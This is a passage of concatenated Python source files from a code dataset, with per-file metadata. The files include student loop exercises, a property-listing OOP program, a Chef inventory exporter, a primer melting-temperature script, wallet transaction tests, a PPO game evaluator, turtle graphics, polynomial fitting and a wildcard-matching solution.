name\n\nclass Pet(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(20))\n owner_id = db.Column(db.Integer, db.ForeignKey('person.id')) \n # When using ForeignKey use the table name\n","sub_path":"sqlalchemy-relationships/onetomany.py","file_name":"onetomany.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"323354251","text":"#Review - #3.1\n\n#3.1 - For Loops \n#e) good example\nfor posIntegersUnderHundred in range(100,0,-10): #incriments by decreasing by 10, starting at 100\n print(posIntegersUnderHundred) #Goes over 9 times (if end value was -1, would stop at 0\n\n#f) incorporating try and except \nblastOff = True \nwhile blastOff == True: #if except is run, goes back to while loop \n try: #if try is not true, and data type is incorrect, goes to except \n countdownTimer = int(input(\"Enter time to countdown to: \"))\n for countdown in range(countdownTimer,-1,-1): #Have to use -1 to count down to 0 and print statement afterward \n print(countdown)\n print(\"Blast off!\")\n blastOff = False\n except:\n print(\"You must enter a number\")\n\n\n#Different values for for loops \nm = int(input(\"Enter the starting value: \"))\nn = int(input(\"Enter the ending value: \"))\ns = int(input(\"Enter the step count: \"))\n\n\nfor userCount in range(m,n,s):\n print(userCount)\n\n\nif m < n: \n for userCount in range(m,n,s):\n print(userCount)\nelif m > n:\n for userCount in range(n,m,s):\n print(userCount)\nelse:\n print(\"You have entered an incorrect step count\")\n\n \n\n\nnumber = int(input(\"Enter a number to multiply by: \"))\n\nfor i in range(1,13):\n print(i, \"x\", number, \"=\", (i * number))\n\n\n\n#For Loops - Day 2 and 3 - Accumlation\n\nfor x in range(1,101):\n numberDivisible = x % 17 #Isn't true until x = 17 (eg) 36 remainder of 17 = 36-34 = 2\n #therefore, not true that remainder is 0 \n if numberDivisible == 0: #if remainder is zero, the number can be evenly dividied \n print(x,end=\" \")\n\n\n#Exercise 1 - Grocery Items and (try Average Grades, E2)\nprint(\"\\n\")\ntotal = 0\ncostItem = 0\nitemsAmount = 0 \n\ngroceries = True\nwhile groceries == True:\n try: #checks if a number is used for items, if not, prints execept condition and loops \n itemsAmount = int(input(\"Enter the amount of items on your grocery bill: \"))\n for x in range(1, (itemsAmount + 1)):\n costItem = float(input(\"Enter the cost of the item which is:\" ))\n total = costItem + total\n print(total)\n if x == (itemsAmount):\n groceries == False\n break\n except:\n print(\"You must enter a number\")\nprint(\"The total cost of your groceries is\", total)\n\n#Exercise 3.1 - Day 3 - For Loops 1, a,b, 4 - c\n#a)\ncountFactors = 0\nprime = False\ninteger = int(input(\"Enter a number between 1 and 50: \"))\nfor i in range(1,50):\n integerFactored = integer % i\n if integerFactored == 0: #Just trying to see remainder of integer as 0\n print(integer, \"can be factored by\", i)\n prime = False\n countFactors += 1\nif countFactors <= 2: #If the number can only be factored by two numbers ie) itself and 1, the number is a prime number\n prime = True\n#b)\nif prime == True:\n print(integer,\"is a prime number.\")\nelif prime == False:\n print(integer, \"is not a prime number.\")\n\n\n#b) Fibonanci -- Good practice!\nprevious = 0\nsumOfNum = 1\nnewNum = 0 \n\nnumbersInFib = int(input(\"Enter the amount of numbers of the sequence of Fibonacci to output: \"))\n\n#in order to avoid duplicate of each 
number, divide by two\nnumbersInFibRemainder = numbersInFib / 2 #check to see if number is even or not\nif (numbersInFib % 2) != 0:\n print(sumOfNum) #if not even, can print extra number to add to proper numbersInFib amount \n\nnumbersInFib = numbersInFib // 2 #since printing twice, only need half expected numbers \nfor amount in range(int(numbersInFib)):\n newNum = previous + sumOfNum\n previous += sumOfNum #two seperate sequencial fib caluations taking place at once, same results, one stores as the previous number, while the other stores as next number \n print(newNum)\n sumOfNum = previous + sumOfNum #creates next following fib number by add previous two nums\n print(sumOfNum) \n","sub_path":"Computer Science/Unit 3 - CS/Review/3.1-Review-Lessons1-2.py","file_name":"3.1-Review-Lessons1-2.py","file_ext":"py","file_size_in_byte":3879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"480034696","text":"def get_valid_input(input_string, valid_options):\n input_string += \" ({}) \".format(\", \".join(valid_options))\n\n response = input(input_string)\n while response.lower() not in valid_options:\n response = input(input_string)\n return response\n\n\nclass Property:\n \"\"\"Class which represents Property\"\"\"\n\n def __init__(self, square_feet='', beds='',\n baths='', **kwargs):\n \"\"\"Initialized the object\"\"\"\n # super().__init__(**kwargs)\n self.square_feet = square_feet\n self.num_bedrooms = beds\n self.num_baths = baths\n\n def display(self):\n \"\"\"Print all information about the object\"\"\"\n print(\"PROPERTY DETAILS\")\n print(\"================\")\n print(\"square footage: {}\".format(self.square_feet))\n print(\"bedrooms: {}\".format(self.num_bedrooms))\n print(\"bathrooms: {}\".format(self.num_baths))\n print()\n\n def prompt_init():\n \"\"\"\n Gathers all the necessary information about the object\n \"\"\"\n return dict(square_feet=input(\"Enter the square feet: \"),\n beds=input(\"Enter number of bedrooms: \"),\n baths=input(\"Enter number of baths: \"))\n\n prompt_init = staticmethod(prompt_init)\n\n\nclass Apartment:\n \"\"\"Class which represents Apartment\"\"\"\n valid_laundries = (\"coin\", \"ensuite\", \"none\")\n valid_balconies = (\"yes\", \"no\", \"solarium\")\n\n def __init__(self, balcony='', laundry='', **kwargs):\n \"\"\"Initialized the object\"\"\"\n self.property = Property(**kwargs)\n self.balcony = balcony\n self.laundry = laundry\n\n def display(self):\n \"\"\"Print all information about the object\"\"\"\n self.property.display()\n print(\"APARTMENT DETAILS\")\n print(\"laundry: %s\" % self.laundry)\n print(\"has balcony: %s\" % self.balcony)\n\n def prompt_init():\n \"\"\"\n Gathers all the necessary information about the object\n \"\"\"\n\n parent_init = Property.prompt_init()\n laundry = ''\n while laundry.lower() not in \\\n Apartment.valid_laundries:\n laundry = input(\"What laundry facilities does \"\n \"the property have? ({})\".format(\n \", \".join(Apartment.valid_laundries)))\n\n balcony = ''\n while balcony.lower() not in \\\n Apartment.valid_balconies:\n balcony = input(\n \"Does the property have a balcony? 
\"\n \"({})\".format(\", \".join(Apartment.valid_balconies)))\n parent_init.update({\n \"laundry\": laundry,\n \"balcony\": balcony\n })\n return parent_init\n\n prompt_init = staticmethod(prompt_init)\n\n\nclass House:\n \"\"\"Class which represents House\"\"\"\n valid_garage = (\"attached\", \"detached\", \"none\")\n valid_fenced = (\"yes\", \"no\")\n\n def __init__(self, num_stories='',\n garage='', fenced='', **kwargs):\n \"\"\"Initialized the object\"\"\"\n self.property = Property(**kwargs)\n\n self.garage = garage\n self.fenced = fenced\n self.num_stories = num_stories\n\n def display(self):\n \"\"\"Print all information about the object\"\"\"\n self.property.display()\n print(\"HOUSE DETAILS\")\n print(\"# of stories: {}\".format(self.num_stories))\n print(\"garage: {}\".format(self.garage))\n print(\"fenced yard: {}\".format(self.fenced))\n\n def prompt_init():\n \"\"\"\n Gathers all the necessary information about the object\n \"\"\"\n parent_init = Property.prompt_init()\n fenced = get_valid_input(\"Is the yard fenced? \",\n House.valid_fenced)\n garage = get_valid_input(\"Is there a garage? \",\n House.valid_garage)\n num_stories = input(\"How many stories? \")\n parent_init.update({\n \"fenced\": fenced,\n \"garage\": garage,\n \"num_stories\": num_stories\n })\n return parent_init\n\n prompt_init = staticmethod(prompt_init)\n\n\nclass Purchase:\n \"\"\"Class which represents Purchase\"\"\"\n\n def __init__(self, price='', taxes='', **kwargs):\n \"\"\"Initialized the object\"\"\"\n # super().__init__(**kwargs)\n self.price = price\n self.taxes = taxes\n\n def display(self):\n \"\"\"Print all information about the object\"\"\"\n # super().display()\n print(\"PURCHASE DETAILS\")\n print(\"selling price: {}\".format(self.price))\n print(\"estimated taxes: {}\".format(self.taxes))\n\n def prompt_init():\n \"\"\"\n Gathers all the necessary information about the object\n \"\"\"\n return dict(\n price=input(\"What is the selling price? \"),\n taxes=input(\"What are the estimated taxes? \"))\n\n prompt_init = staticmethod(prompt_init)\n\n\nclass Rental:\n \"\"\"Class which represents Rental\"\"\"\n\n def __init__(self, furnished='', utilities='',\n rent='', **kwargs):\n \"\"\"Initialized the object\"\"\"\n # super().__init__(**kwargs)\n self.furnished = furnished\n self.rent = rent\n self.utilities = utilities\n\n def display(self):\n \"\"\"Print all information about the object\"\"\"\n # super().display()\n print(\"RENTAL DETAILS\")\n print(\"rent: {}\".format(self.rent))\n print(\"estimated utilities: {}\".format(\n self.utilities))\n print(\"furnished: {}\".format(self.furnished))\n\n def prompt_init():\n \"\"\"\n Gathers all the necessary information about the object\n \"\"\"\n return dict(\n rent=input(\"What is the monthly rent? \"),\n utilities=input(\n \"What are the estimated utilities? \"),\n furnished=get_valid_input(\n \"Is the property furnished? 
\",\n (\"yes\", \"no\")))\n\n prompt_init = staticmethod(prompt_init)\n\n\nclass ApartmentRental():\n \"\"\"\n Represents information about an apartment which be rented\n \"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"Initialized an object\"\"\"\n self.rental = Rental(**kwargs)\n self.apartment = Apartment(**kwargs)\n\n def display(self):\n \"\"\"\n Print all information\n \"\"\"\n self.apartment.display()\n self.rental.display()\n\n def prompt_init():\n \"\"\"\n Gathers all the necessary information about the object\n \"\"\"\n init = Apartment.prompt_init()\n init.update(Rental.prompt_init())\n return init\n\n prompt_init = staticmethod(prompt_init)\n\n\nclass HouseRental():\n \"\"\"\n Represents information about a house which be rented\n \"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"Initialized an object\"\"\"\n self.rental = Rental(**kwargs)\n self.house = House(**kwargs)\n\n def display(self):\n \"\"\"\n Print all information\n \"\"\"\n self.house.display()\n self.rental.display()\n\n def prompt_init():\n \"\"\"\n Gathers all the necessary information about the object\n \"\"\"\n init = House.prompt_init()\n init.update(Rental.prompt_init())\n return init\n\n prompt_init = staticmethod(prompt_init)\n\n\nclass ApartmentPurchase():\n \"\"\"\n Represents information about an apartment which be purchased\n \"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"Initialized an object\"\"\"\n self.purchase = Purchase(**kwargs)\n self.apartment = Apartment(**kwargs)\n\n def display(self):\n \"\"\"\n Print all information\n \"\"\"\n self.apartment.display()\n self.purchase.display()\n\n def prompt_init():\n \"\"\"\n Gathers all the necessary information about the object\n \"\"\"\n init = Apartment.prompt_init()\n init.update(Purchase.prompt_init())\n return init\n\n prompt_init = staticmethod(prompt_init)\n\n\nclass HousePurchase:\n \"\"\"\n Represents information about an house which be purchased\n \"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"Initialized an object\"\"\"\n self.purchase = Purchase(**kwargs)\n self.house = House(**kwargs)\n\n def display(self):\n \"\"\"\n Print all information\n \"\"\"\n self.house.display()\n self.purchase.display()\n\n def prompt_init():\n \"\"\"\n Gathers all the necessary information about the object\n \"\"\"\n init = House.prompt_init()\n init.update(Purchase.prompt_init())\n return init\n\n prompt_init = staticmethod(prompt_init)\n\n\nclass Agent:\n \"\"\"\n Class for Agent representation\n \"\"\"\n type_map = {\n (\"house\", \"rental\"): HouseRental,\n (\"house\", \"purchase\"): HousePurchase,\n (\"apartment\", \"rental\"): ApartmentRental,\n (\"apartment\", \"purchase\"): ApartmentPurchase\n }\n\n def __init__(self):\n self.property_list = []\n self.client_dict = {(\"house\", \"rental\"): [],\n (\"house\", \"purchase\"): [],\n (\"apartment\", \"rental\"): [],\n (\"apartment\", \"purchase\"): []}\n\n def display_properties(self):\n \"\"\"\n Print all information about properties\n \"\"\"\n for property in self.property_list:\n property.display()\n\n def add_property(self):\n \"\"\"\n Add properties to property list\n \"\"\"\n property_type = get_valid_input(\n \"What type of property? \",\n (\"house\", \"apartment\")).lower()\n\n payment_type = get_valid_input(\n \"What payment type? 
\",\n (\"purchase\", \"rental\")).lower()\n property_class = self.type_map[\n (property_type, payment_type)]\n init_args = property_class.prompt_init()\n self.property_list.append(property_class(**init_args))\n self.inform_clients((property_type, payment_type))\n\n def find_interested_property(self):\n \"\"\"\n Find better property for client\n \"\"\"\n property_type = get_valid_input(\n \"What type of property you want to find? \",\n (\"house\", \"apartment\")).lower()\n\n payment_type = get_valid_input(\n \"What payment type you want to find? \",\n (\"purchase\", \"rental\")).lower()\n property_class = self.type_map[\n (property_type, payment_type)]\n\n for property in self.property_list:\n if isinstance(property, property_class):\n property.display()\n\n answer = get_valid_input(\n \"Do you want to leave your contact information\" +\n \"and we called you when we find the property,\\n\" +\n \"which can be interested for you?\", (\"yes\", \"no\"))\n if answer == \"yes\":\n contacts = input(\"Write them down, please: \")\n self.client_dict[(property_type, payment_type)].append(\n contacts)\n else:\n print(\"Thank you, goodbye\")\n\n def inform_clients(self, type_clients):\n print()\n if len(self.client_dict[type_clients]) != 0:\n print(\"If it were a real system,\",\n \" it would notify a person with these contact details:\")\n for i in self.client_dict[type_clients]:\n print(\"notify \", i)\n print(\"That's all\")\n","sub_path":"agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":11259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"573043451","text":"#!/usr/bin/env python2.7\nfrom __future__ import print_function\n\nimport argparse\nimport chef\nfrom concurrent.futures import ThreadPoolExecutor, as_completed\nimport csv\nfrom itertools import izip_longest\nfrom operator import methodcaller\nimport signal\nimport sys\n\nCHEF_NODES = \"\"\"\nmyserver-1234\nnodename-999\ndb01\ndb02\n\"\"\".split()\n\nCHEF_ATTRIBUTES = \"\"\"\nname\nchef_environment\nrun_list\n\nfqdn\nuptime\nhostname\nnetwork.default_gateway\nnetwork.ipaddress_eth0\nnetwork.ipaddress_eth1\nec2.public_ipv4\nmy.super.cool.attribute\n\"\"\".split()\n\nWORKER_COUNT = 32\n\n\ndef tryget(collection, key_path):\n \"\"\"\n This function takes an array of keys\n and chains .get calls to a dict-like collection\n\n It'll return None if it gets a KeyError\n \"\"\"\n if not isinstance(collection, dict):\n raise Exception('collection should be a dict. 
got {}'.format(type(collection)))\n # pychef treats these attributes differently :(\n if key_path[0] not in ['name', 'chef_environment', 'run_list']:\n collection = collection['automatic']\n\n collection_keys = [collection] + key_path\n\n try:\n item = reduce(lambda coll, key: methodcaller('__getitem__', key)(coll),\n collection_keys)\n return item\n except KeyError:\n return\n\n\n# Lifted from the itertools docs\ndef grouper(iterable, n, fillvalue=None):\n args = [iter(iterable)] * n\n return izip_longest(fillvalue=fillvalue, *args)\n\n\ndef transform_chef_data(search_futures, chef_attrs=CHEF_ATTRIBUTES):\n \"\"\"\n Given a list of chef.Search futures,\n yield {chef_attribute: value} for each row matched\n \"\"\"\n # as_completed will yield completed futures as they finish\n for chef_search in as_completed(search_futures):\n for search_row in chef_search.result(timeout=3):\n yield {attr: tryget(search_row, attr.split('.'))\n for attr in chef_attrs}\n\n\ndef writecsv(chef_data, csvfile, headers=CHEF_ATTRIBUTES):\n \"\"\"\n Given a filename and a list of {column: field} rows,\n write the results to a csv file\n \"\"\"\n writer = csv.DictWriter(csvfile, fieldnames=headers, lineterminator='\\n')\n writer.writeheader()\n try:\n map(writer.writerow, chef_data)\n except Exception as e:\n print(e)\n raise\n\n\ndef signal_handler(sig, frame):\n print('Aborting!')\n sys.exit(1)\n\n\ndef parse_args(args):\n argp = argparse.ArgumentParser()\n argp.add_argument('filename')\n argp.add_argument('-C', '--workers', default=WORKER_COUNT)\n argp.add_argument('--chunks', default=1)\n return argp.parse_args(args)\n\n\ndef fetch_chef_data(num_workers, chunks):\n chef_api = chef.autoconfigure()\n assert chef_api, 'Failed to create chef_api object'\n\n with ThreadPoolExecutor(max_workers=num_workers) as executor:\n chef_searches = [executor.submit(chef.Search,\n index='node',\n q=query,\n api=chef_api)\n # Chunk up the work to distribute to our threads\n for chunk in grouper(CHEF_NODES, chunks)\n # Build queries from the node chunks\n # eg. 
\"name:chefnode OR name:othernode OR db01\"\n for query in [' OR '.join(['name:{}'.format(name)\n for name in chunk])]]\n return chef_searches\n\n\ndef main():\n args = parse_args(sys.argv[1:])\n\n signal.signal(signal.SIGINT, signal_handler)\n\n # Return a list of Futures storing the results of our Chef searches\n chef_searches = fetch_chef_data(args.workers, args.chunks)\n # Pass the list of Futures into our data-massaging functions\n transformed_chef_data = transform_chef_data(chef_searches)\n # finally, write those things into a csv\n with open(args.filename, 'w') as fh:\n writecsv(transformed_chef_data, fh)\n\n print('done!')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"chef_schlepper.py","file_name":"chef_schlepper.py","file_ext":"py","file_size_in_byte":3991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"553802663","text":"#!/usr/bin/env python\n\nimport sys\nfrom Bio.SeqUtils import molecular_weight\nfrom Bio.SeqUtils import MeltingTemp as mt\n\nprint(\"python: \" + sys.version, end=\"\\n\", file=sys.stderr)\nprint(sys.argv[1], end=\"\\n\", file=sys.stderr)\n\nwith open(sys.argv[1]) as file:\n for line in file:\n row = line.rstrip('\\n').split(\"\\t\")\n seq = row[3]\n\n if seq == 'cdna':\n row.extend([\"tm_nn\", \"tm_gc\", \"tm_wallace\"])\n print(\",\".join(row))\n\n else:\n mw = molecular_weight(seq, 'DNA', False)\n\n row.append('%0.2f' % mt.Tm_NN(seq))\n row.append('%0.2f' % mt.Tm_GC(seq))\n row.append('%0.2f' % mt.Tm_Wallace(seq))\n\n print(\",\".join(row))\n","sub_path":"aso-design/script/calculate_props.py","file_name":"calculate_props.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"650619385","text":"#!/usr/bin/python2\nfrom calculator import Calculator\nfrom sys import stdout\n\ndef\tmtests(mfilename, comparator):\n\tprint(\"Testing \" + mfilename)\n\tmcalc = Calculator([])\n\tf = open(mfilename, \"r\")\n\tfor line in f:\n\t\tline = line.rstrip()\n\t\tstdout.write(\".\")\n\t\tmres = mcalc.validate_expression(line)\n\t\tif mres != comparator:\n\t\t\tprint(\"ERROR! 
: [\" + line + \"] this expression should be \" + str(comparator) + \"!\")\n\tf.close()\n\tprint(\"\\nEnd\\n\")\n\nif __name__ == \"__main__\":\n\tmtests(\"invalid_expressions\", False)\n\tmtests(\"valid_expressions\", True)\n","sub_path":"1_challenge_npi_python/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"548371020","text":"# Copyright (c) 2020, hukkinj1 (licensed under the MIT License)\n# Modifications Copyright (c) 2020, Foris Limited (licensed under the Apache License, Version 2.0)\n\nfrom unittest.mock import Mock\n\nfrom chainlibpy import Transaction, Wallet\n\n\ndef test_sign():\n unordered_sign_message = {\n \"chain_id\": \"tendermint_test\",\n \"account_number\": \"1\",\n \"fee\": {\"gas\": \"21906\", \"amount\": [{\"amount\": \"0\", \"denom\": \"\"}]},\n \"memo\": \"\",\n \"sequence\": \"0\",\n \"msgs\": [\n {\n \"type\": \"cosmos-sdk/Send\",\n \"value\": {\n \"inputs\": [\n {\n \"address\": \"tcro1qperwt9wrnkg5k9e5gzfgjppzpqhyav5j24d66\",\n \"coins\": [{\"amount\": \"1\", \"denom\": \"STAKE\"}],\n }\n ],\n \"outputs\": [\n {\n \"address\": \"tcro1yeckxz7tapz34kjwnjxvmxzurerquhtrmxmuxt\",\n \"coins\": [{\"amount\": \"1\", \"denom\": \"STAKE\"}],\n }\n ],\n },\n }\n ],\n }\n seed = \"dune car envelope chuckle elbow slight proud fury remove candy uphold puzzle call select sibling sport gadget please want vault glance verb damage gown\"\n wallet = Wallet(seed)\n dummy_num = 1337\n tx = Transaction(\n wallet=wallet,\n account_num=dummy_num,\n sequence=dummy_num,\n fee=dummy_num,\n gas=dummy_num,\n )\n tx._get_sign_message = Mock(return_value=unordered_sign_message) # type: ignore\n\n expected_signature = \"s2Yz6UjEpLJuNcyWn5E2adUu5Vn7gbKwrtyoBrQWEhUTomnxlASRnP/1GD/j1MD4PeJsNtE0MOjwOyFt8dU2cw==\"\n\n actual_signature = tx._sign()\n assert actual_signature == expected_signature\n\n\ndef test_get_pushable_tx():\n expected_pushable_tx = {\n \"tx\": {\n \"msg\": [\n {\n \"type\": \"cosmos-sdk/MsgSend\",\n \"value\": {\n \"from_address\": \"cro1u9q8mfpzhyv2s43js7l5qseapx5kt3g2rf7ppf\",\n \"to_address\": \"cro103l758ps7403sd9c0y8j6hrfw4xyl70j4mmwkf\",\n \"amount\": [{\"denom\": \"basecro\", \"amount\": \"288000\"}],\n },\n }\n ],\n \"fee\": {\n \"gas\": \"30000\",\n \"amount\": [{\"amount\": \"100000\", \"denom\": \"basecro\"}],\n },\n \"memo\": \"\",\n \"signatures\": [\n {\n \"signature\": \"WjB3aB3k/nUK33iyGvbMPu55iiyCJBr7ooKQXwxE1BFAdBjJXIblp1aVPUjlr/blFAlHW7fLJct9zc/7ty8ZQA==\",\n \"pub_key\": {\n \"type\": \"tendermint/PubKeySecp256k1\",\n \"value\": \"AntL+UxMyJ9NZ9DGLp2v7a3dlSxiNXMaItyOXSRw8iYi\",\n },\n \"account_number\": \"11335\",\n \"sequence\": \"0\",\n }\n ],\n },\n \"mode\": \"sync\",\n }\n seed = \"dune car envelope chuckle elbow slight proud fury remove candy uphold puzzle call select sibling sport gadget please want vault glance verb damage gown\"\n wallet = Wallet(seed)\n fee = 100000\n _tx_total_cost = 388000\n amount = _tx_total_cost - fee\n\n tx = Transaction(\n wallet=wallet,\n account_num=11335,\n sequence=0,\n fee=fee,\n gas=30000,\n chain_id=\"test\",\n )\n tx.add_transfer(\n to_address=\"cro103l758ps7403sd9c0y8j6hrfw4xyl70j4mmwkf\", amount=amount\n )\n pushable_tx = tx.get_pushable()\n assert pushable_tx == expected_pushable_tx\n","sub_path":"tests/test_transaction.py","file_name":"test_transaction.py","file_ext":"py","file_size_in_byte":3629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} 
+{"seq_id":"393706059","text":"\"\"\"\n@author: Viet Nguyen \nFrom: https://github.com/uvipen/Super-mario-bros-PPO-pytorch\n\nRe-implemented to use gym-retro by Gerardo Aragon-Camarasa\n\nModified for Benchmarking Reinforcement Learning Algorithms in NES Games by Erin-Louise Connolly\n\"\"\"\n\nimport csv\nimport os\nimport sys\nimport time\nfrom collections import deque\n\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\n\nfrom src.env import create_train_env\nfrom src.helpers import COMPLEX_MOVEMENT, RIGHT_ONLY, SIMPLE_MOVEMENT\nfrom src.model import PPO\n\n\ndef evaluate(opt, global_model, num_states, num_actions):\n torch.manual_seed(123)\n if opt.action_type == \"right\":\n actions = RIGHT_ONLY\n elif opt.action_type == \"simple\":\n actions = SIMPLE_MOVEMENT\n else:\n actions = COMPLEX_MOVEMENT\n\n savefile = opt.saved_path + '/pacman_PPO_test' + opt.timestr + '.csv'\n print(savefile)\n title = ['Steps', 'Time', 'TotalReward']\n with open(savefile, 'w', newline='') as sfile:\n writer = csv.writer(sfile)\n writer.writerow(title)\n\n env = create_train_env(opt.world,opt.stage,actions, mp_wrapper=False)\n local_model = PPO(num_states, num_actions)\n if torch.cuda.is_available():\n local_model.cuda()\n local_model.eval()\n\n state = torch.from_numpy(env.reset())\n if torch.cuda.is_available():\n state = state.cuda()\n \n done = True\n curr_step = 0\n tot_step = 0\n actions = deque(maxlen=opt.max_actions)\n tot_reward = 0\n while True:\n start_time = time.time()\n curr_step += 1\n tot_step += 1\n if done:\n local_model.load_state_dict(global_model.state_dict())\n\n logits, value = local_model(state)\n policy = F.softmax(logits, dim=1)\n action = torch.argmax(policy).item() # This selects the best action to take\n state, reward, done, info = env.step(action)\n tot_reward += reward\n env.render()\n actions.append(action)\n\n if actions.count(actions[0]) == actions.maxlen:\n done = True\n\n if done:\n ep_time = time.time() - start_time\n data = [tot_step, \"{:.4f}\".format(ep_time), \"{:.2f}\".format(tot_reward)]\n with open(savefile, 'a', newline='') as sfile:\n writer = csv.writer(sfile)\n writer.writerows([data])\n \n curr_step = 0\n tot_reward = 0\n actions.clear()\n state = env.reset()\n\n state = torch.from_numpy(state)\n if torch.cuda.is_available():\n state = state.cuda()\n","sub_path":"pacman/PPO/src/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":2595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"3333561","text":"from turtle import Turtle\nimport time\nimport random\nColors = [\"AliceBlue\", \"AntiqueWhite\", \"aquamarine\", \"azure\", \"beige\", \"bisque\", \"BlanchedAlmond\", \"blue\", \"BlueViolet\",\n \"brown\", \"burlywood\", \"CadetBlue\", \"chartreuse\", \"chocolate\", \"coral\", \"CornflowerBlue\", \"cornsilk\", \"cyan\"]\n\n\nclass NinjaTurtle(Turtle):\n # inherits from ^^ Turtle\n\n # This is the constructor. 
It's what's run whenever\n # you create a new ninja turtle\n def __init__(self, color, skill_level):\n # call parent class constructor\n # this sets up all the basic turtle stuff\n Turtle.__init__(self)\n\n # make standard turtle more ninja-like\n self.shape(\"turtle\")\n self.speed(\"fastest\")\n\n # set instance variables\n # (stuff that's unique to each ninja turtle)\n self.color(color)\n self.mad_skills = skill_level\n\n def loss(self):\n self.hideturtle()\n time.sleep(.1)\n self.showturtle()\n for _ in range(5):\n self.hideturtle()\n time.sleep(.3)\n self.right(random.randint(-180, 180))\n self.showturtle()\n time.sleep(.3)\n\n def victory_dance(self):\n time.sleep(1)\n self.setheading(90)\n self.forward(115)\n self.right(90)\n self.pendown()\n for i in range(18):\n for x in range(i):\n self.right(x / 2)\n self.pensize(x)\n self.forward(x)\n self.pencolor(random.choice(Colors))\n self.right(90)\n self.pensize(10)\n self.forward(220)\n self.hideturtle()\n","sub_path":"ninja_turtle.py","file_name":"ninja_turtle.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"20532795","text":"import numpy as np\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.kernel_ridge import KernelRidge\n\ndef predict_degrees(x, y):\n \"\"\"\n predict how many degrees are represented by polynomial data\n \"\"\"\n x = x.reshape(-1, 1)\n params = {'degree': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]}\n model = KernelRidge(kernel = 'poly')\n classifier = GridSearchCV(model, params)\n classifier.fit(x, y)\n best_params = classifier.best_params_\n degree = best_params['degree']\n return degree\n\ndef predict_function(x, y, degree):\n x = x.reshape(x.shape[0], )\n poly = np.polyfit(x = x, y = y, deg = degree)\n string = 'Function: '\n total = degree\n for i in range(degree + 1):\n if round(poly[i], 2) != 0.:\n if len(string) == 10:\n string = string + \"{}*x^{}\".format(round(poly[i], 2), total)\n elif total == 0:\n string = string + \" + {}\".format(round(poly[i], 2))\n else:\n string = string + \" + {}*x^{}\".format(round(poly[i], 2), total)\n total -= 1\n return string\n \ndef print_function(x, y):\n x = np.array(x)\n y = np.array(y)\n degree = predict_degrees(x, y)\n string = predict_function(x, y, degree)\n return string\n\n\n#test it\nX_data = [-1.2, -0.01, 1.23, 1.8, 20, 21, 22, 23.1, 123]\ny_data = [526.8246347954033,\n 16.934384611296693,\n 34.90225474157847,\n 53.19035775656099,\n 1041679.9259436745,\n 1293754.150079261,\n 1588916.0855719403,\n 1968905.8269523252,\n 2121261427.2929053]\n\nprint(print_function(X_data, y_data)) #prints: Function: 9.87*x^4 + -75.4*x^3 + 169.14*x^2 + -97.05*x^1 + 16.03\n#the data above actually represents: π^2 x^4 - 24 π x^3 + 8 π x^2 + 144 x^2 - 97 x + 16\n","sub_path":"function_approximator.py","file_name":"function_approximator.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"574998334","text":"# '?' 
Matches any single character.\n# '*' Matches any sequence of characters (including the empty sequence).\n#\n# The matching should cover the entire input string (not partial).\n#\n# The function prototype should be:\n# bool isMatch(const char *s, const char *p)\nclass Solution(object):\n def isMatch(self, s, p):\n \"\"\"\n :type s: str\n :type p: str\n :rtype: bool\n \"\"\"\n DP = [[False for i in xrange(len(p)+1)] for j in xrange(len(s)+1)]\n DP[0][0] = True\n for i in xrange(1, len(s)+1):\n DP[i][0] = False\n for j in xrange(1, len(p)+1):\n if p[j-1] == '*':\n DP[0][j] = DP[0][j-1]\n\n for i in xrange(1, len(s)+1):\n for j in xrange(1, len(p)+1):\n if p[j-1] == s[i-1]:\n DP[i][j] = DP[i-1][j-1]\n elif p[j-1] == '?':\n DP[i][j] = DP[i-1][j-1]\n elif p[j-1] == '*':\n DP[i][j] = DP[i-1][j] or DP[i][j-1]\n\n return DP[len(s)][len(p)]\nn = Solution()\n# print n.isMatch(\"ppp\",\"pp\")\n# print n.isMatch(\"pzfasdn\",\"p*n\")\n# print n.isMatch(\"psa\",\"?sa\")\n# print n.isMatch(\"vvvv\",\"avv\")\nimport unittest\nclass Test_wildcardMatching(unittest.TestCase):\n def setUp(self):\n self.n = Solution()\n def test_matching(self):\n self.assertTrue(n.isMatch(\"\", \"\"), \"the pattern matches\")\n self.assertTrue(n.isMatch(\"pzfasdn\", \"p*n\"),\"the pattern matches\")\n self.assertTrue(n.isMatch(\"psa\", \"?sa\"), \"the pattern matches\")\n self.assertTrue(n.isMatch(\"paa\",\"paa\"),\"the pattern matches\")\n self.assertTrue(n.isMatch(\"\", \"*\"), \"the pattern matches\")\n self.assertTrue(n.isMatch(\"\", \"**\"), \"the pattern matches\")\n\n self.assertTrue(n.isMatch(\"a\", \"*?\"), \"the pattern matches\")\n def test_not_matching(self):\n self.assertFalse(n.isMatch(\"\", \"p*n\"), \"the pattern matches\")\n self.assertFalse(n.isMatch(\"\", \"*?\"), \"the pattern matches\")\n 